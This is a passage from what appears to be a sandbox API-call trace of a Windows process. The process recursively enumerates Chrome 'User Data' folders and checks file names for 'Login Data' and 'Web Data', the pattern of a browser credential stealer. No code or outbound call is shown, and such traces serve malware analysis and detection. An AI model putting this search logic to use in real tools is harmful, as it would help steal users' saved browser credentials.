(uFlags=0x40, uBytes=0xf2) returned 0x578c40 [0590.150] lstrlenW (lpString="Local State") returned 11 [0590.150] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.150] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5d1178 [0590.150] LocalFree (hMem=0x578c40) returned 0x0 [0590.150] StrStrIW (lpFirst="Local State", lpSrch="Web Data") returned 0x0 [0590.150] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.150] lstrcmpiW (lpString1="OriginTrials", lpString2=".") returned 1 [0590.150] lstrcmpiW (lpString1="OriginTrials", lpString2="..") returned 1 [0590.150] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.150] lstrlenW (lpString="\\") returned 1 [0590.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.151] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x578c40 [0590.151] lstrlenW (lpString="OriginTrials") returned 12 [0590.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.151] LocalAlloc (uFlags=0x40, uBytes=0x10a) returned 0x5d0e30 [0590.151] LocalFree (hMem=0x578c40) returned 0x0 [0590.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 68 [0590.151] lstrlenW (lpString="\\*.*") returned 4 [0590.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 68 [0590.151] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x5ec228 [0590.151] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\*.*", lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0x57c9a0 [0590.151] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.151] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.151] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.151] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.151] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0 [0590.151] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.151] LocalFree (hMem=0x5ec228) returned 0x0 [0590.151] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.151] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.151] lstrcmpiW (lpString1="PepperFlash", lpString2=".") returned 1 [0590.151] lstrcmpiW (lpString1="PepperFlash", lpString2="..") returned 1 [0590.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.151] lstrlenW (lpString="\\") returned 1 [0590.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.151] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x578c40 [0590.151] lstrlenW (lpString="PepperFlash") returned 11 [0590.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.151] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5d0e30 [0590.151] LocalFree (hMem=0x578c40) returned 0x0 [0590.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 67 [0590.151] lstrlenW (lpString="\\*.*") returned 4 [0590.151] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 67 [0590.151] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5d1290 [0590.151] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\*.*", lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0x57c9a0 [0590.151] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.151] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.151] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.151] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.151] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0 [0590.151] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.152] LocalFree (hMem=0x5d1290) returned 0x0 [0590.152] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.152] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.152] lstrcmpiW (lpString1="pnacl", lpString2=".") returned 1 [0590.152] lstrcmpiW (lpString1="pnacl", lpString2="..") returned 1 [0590.152] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.152] lstrlenW (lpString="\\") returned 1 [0590.152] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.152] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x578c40 [0590.152] lstrlenW (lpString="pnacl") returned 5 [0590.152] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.152] LocalAlloc (uFlags=0x40, uBytes=0xfc) returned 0x578d40 [0590.152] LocalFree (hMem=0x578c40) returned 0x0 [0590.152] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 61 [0590.152] lstrlenW (lpString="\\*.*") returned 4 [0590.152] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 61 [0590.152] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5d0e30 [0590.152] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\*.*", lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0x57c9a0 [0590.152] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.152] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.152] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.152] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.152] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0 [0590.152] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.152] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.152] LocalFree (hMem=0x578d40) returned 0x0 [0590.152] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.153] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2=".") returned 1 [0590.153] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="..") returned 1 [0590.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.153] lstrlenW (lpString="\\") returned 1 [0590.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.153] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x578c40 [0590.153] lstrlenW (lpString="SSLErrorAssistant") returned 17 [0590.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.153] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x5ec228 [0590.153] LocalFree (hMem=0x578c40) returned 0x0 [0590.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 73 [0590.153] lstrlenW (lpString="\\*.*") returned 4 [0590.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 73 [0590.153] LocalAlloc (uFlags=0x40, uBytes=0x11c) returned 0x5ec350 [0590.153] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*.*", lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0x57c9a0 [0590.153] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.153] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.153] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.153] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.153] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0 [0590.153] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.153] LocalFree (hMem=0x5ec350) returned 0x0 [0590.153] LocalFree (hMem=0x5ec228) returned 0x0 [0590.153] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.153] lstrcmpiW (lpString1="SwReporter", lpString2=".") returned 1 [0590.153] lstrcmpiW (lpString1="SwReporter", lpString2="..") returned 1 [0590.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.153] lstrlenW (lpString="\\") returned 1 [0590.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.153] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x578c40 [0590.153] lstrlenW (lpString="SwReporter") returned 10 [0590.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.153] LocalAlloc (uFlags=0x40, uBytes=0x106) returned 0x5d0e30 [0590.153] LocalFree (hMem=0x578c40) returned 0x0 [0590.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 66 [0590.153] lstrlenW (lpString="\\*.*") returned 4 [0590.153] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 66 [0590.153] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5d1290 [0590.153] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*.*", lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0x57c9a0 [0590.153] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.153] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.154] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.154] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.154] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0 [0590.154] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.154] LocalFree (hMem=0x5d1290) returned 0x0 [0590.154] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.154] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 1 [0590.154] lstrcmpiW (lpString1="WidevineCdm", lpString2=".") returned 1 [0590.154] lstrcmpiW (lpString1="WidevineCdm", lpString2="..") returned 1 [0590.154] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.154] lstrlenW (lpString="\\") returned 1 [0590.154] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.154] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x578c40 [0590.154] lstrlenW (lpString="WidevineCdm") returned 11 [0590.154] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.154] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5d0e30 [0590.154] LocalFree (hMem=0x578c40) returned 0x0 [0590.154] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 67 [0590.154] lstrlenW (lpString="\\*.*") returned 4 [0590.154] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 67 [0590.154] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5d1290 [0590.154] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*.*", lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0x57c9a0 [0590.154] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.154] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 1 [0590.154] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.154] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.154] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dba4 | out: lpFindFileData=0x52dba4) returned 0 [0590.154] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.154] LocalFree (hMem=0x5d1290) returned 0x0 [0590.154] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.154] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de20 | out: lpFindFileData=0x52de20) returned 0 [0590.154] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.154] LocalFree (hMem=0x5a1300) returned 0x0 [0590.154] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.154] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e09c | out: lpFindFileData=0x52e09c) returned 0 [0590.154] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0590.154] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.154] LocalFree (hMem=0x2ed0060) returned 0x0 [0590.154] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x5eb208 [0590.154] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5eb208 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0590.155] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0590.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local") returned 31 [0590.155] LocalAlloc (uFlags=0x40, uBytes=0xdc) returned 0x2ed0060 [0590.155] LocalFree (hMem=0x5eb208) returned 0x0 [0590.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome") returned 45 [0590.155] lstrlenW (lpString="\\*.*") returned 4 [0590.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome") returned 45 [0590.155] LocalAlloc (uFlags=0x40, uBytes=0xe4) returned 0x2ed2ab0 [0590.155] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\*.*", lpFindFileData=0x52e08c | out: lpFindFileData=0x52e08c) returned 0x57d1e0 [0590.155] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.155] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e08c | out: lpFindFileData=0x52e08c) returned 1 [0590.155] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.155] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.155] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e08c | out: lpFindFileData=0x52e08c) returned 1 [0590.155] lstrcmpiW (lpString1="User Data", lpString2=".") returned 1 [0590.155] lstrcmpiW (lpString1="User Data", lpString2="..") returned 1 [0590.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome") returned 45 [0590.155] lstrlenW (lpString="\\") returned 1 [0590.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome") returned 45 [0590.155] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0148 [0590.155] lstrlenW (lpString="User Data") returned 9 [0590.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\") returned 46 [0590.155] LocalAlloc (uFlags=0x40, uBytes=0xf0) returned 0x59f8b0 [0590.155] LocalFree (hMem=0x2ed0148) returned 0x0 [0590.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.155] lstrlenW (lpString="\\*.*") returned 4 [0590.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.155] LocalAlloc (uFlags=0x40, uBytes=0xf8) returned 0x5d7c90 [0590.155] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 0x57ca60 [0590.155] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.155] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.155] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.155] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.155] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.155] lstrcmpiW (lpString1="CertificateTransparency", lpString2=".") returned 1 [0590.155] lstrcmpiW (lpString1="CertificateTransparency", lpString2="..") returned 1 [0590.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.155] lstrlenW (lpString="\\") returned 1 [0590.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.155] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5a1300 [0590.155] lstrlenW (lpString="CertificateTransparency") returned 23 [0590.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.155] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x5ec228 [0590.155] LocalFree (hMem=0x5a1300) returned 0x0 [0590.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 79 [0590.155] lstrlenW (lpString="\\*.*") returned 4 [0590.155] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 79 [0590.156] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x5a1300 [0590.156] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*.*", lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0x57c9a0 [0590.156] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.156] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.156] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.156] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.156] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0 [0590.156] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.156] LocalFree (hMem=0x5a1300) returned 0x0 [0590.156] LocalFree (hMem=0x5ec228) returned 0x0 [0590.156] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.156] lstrcmpiW (lpString1="Crashpad", lpString2=".") returned 1 [0590.156] lstrcmpiW (lpString1="Crashpad", lpString2="..") returned 1 [0590.156] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.156] lstrlenW (lpString="\\") returned 1 [0590.156] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.156] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5a1300 [0590.156] lstrlenW (lpString="Crashpad") returned 8 [0590.156] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.156] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0e30 [0590.156] LocalFree (hMem=0x5a1300) returned 0x0 [0590.156] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0590.156] lstrlenW (lpString="\\*.*") returned 4 [0590.156] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0590.156] LocalAlloc (uFlags=0x40, uBytes=0x10a) returned 0x5d1290 [0590.156] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*.*", lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0x57c9a0 [0590.156] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.156] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.156] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.156] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.156] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.156] lstrlenW (lpString="\\") returned 1 [0590.156] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0590.156] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5ed228 [0590.156] lstrlenW (lpString="metadata") returned 8 [0590.156] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 65 [0590.156] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x5ec228 [0590.156] LocalFree (hMem=0x5ed228) returned 0x0 [0590.156] StrStrIW (lpFirst="metadata", lpSrch="Login Data") returned 0x0 [0590.156] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.156] lstrcmpiW (lpString1="reports", lpString2=".") returned 1 [0590.156] lstrcmpiW (lpString1="reports", lpString2="..") returned 1 [0590.156] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0590.156] lstrlenW (lpString="\\") returned 1 [0590.156] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0590.156] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5ed228 [0590.157] lstrlenW (lpString="reports") returned 7 [0590.157] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 65 [0590.157] LocalAlloc (uFlags=0x40, uBytes=0x112) returned 0x5ec350 [0590.157] LocalFree (hMem=0x5ed228) returned 0x0 [0590.157] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned 72 [0590.157] lstrlenW (lpString="\\*.*") returned 4 [0590.157] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned 72 [0590.157] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x5ec478 [0590.157] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*.*", lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0x5b9b50 [0590.157] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.157] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 1 [0590.157] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.157] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.157] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0 [0590.157] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.157] LocalFree (hMem=0x5ec478) returned 0x0 [0590.157] LocalFree (hMem=0x5ec350) returned 0x0 [0590.157] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 1 [0590.157] lstrlenW (lpString="\\") returned 1 [0590.157] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 64 [0590.157] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x5ed228 [0590.157] lstrlenW (lpString="settings.dat") returned 12 [0590.157] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 65 [0590.157] LocalAlloc (uFlags=0x40, uBytes=0x11c) returned 0x5ec350 [0590.157] LocalFree (hMem=0x5ed228) returned 0x0 [0590.157] StrStrIW (lpFirst="settings.dat", lpSrch="Login Data") returned 0x0 [0590.157] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0 [0590.157] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.157] LocalFree (hMem=0x5d1290) returned 0x0 [0590.157] LocalFree (hMem=0x5d0e30) returned 0x0 [0590.157] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.157] lstrlenW (lpString="\\") returned 1 [0590.157] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.157] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5a1300 [0590.157] lstrlenW (lpString="CrashpadMetrics-active.pma") returned 26 [0590.157] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.157] LocalAlloc (uFlags=0x40, uBytes=0x126) returned 0x578c40 [0590.157] LocalFree (hMem=0x5a1300) returned 0x0 [0590.157] StrStrIW (lpFirst="CrashpadMetrics-active.pma", lpSrch="Login Data") returned 0x0 [0590.157] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de10 | out: lpFindFileData=0x52de10) returned 1 [0590.157] lstrcmpiW (lpString1="Default", lpString2=".") returned 1 [0590.157] lstrcmpiW (lpString1="Default", lpString2="..") returned 1 [0590.157] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.157] lstrlenW (lpString="\\") returned 1 [0590.157] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0590.157] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5a1300 [0590.157] lstrlenW (lpString="Default") returned 7 [0590.157] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0590.157] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x5e6088 [0590.157] LocalFree (hMem=0x5a1300) returned 0x0 [0590.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.158] lstrlenW (lpString="\\*.*") returned 4 [0590.158] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 63 [0590.158] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5d0e30 [0590.158] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*.*", lpFindFileData=0x52db94 | out: lpFindFileData=0x52db94) returned 0x57c9a0 [0590.158] lstrcmpiW (lpString1=".", lpString2=".") 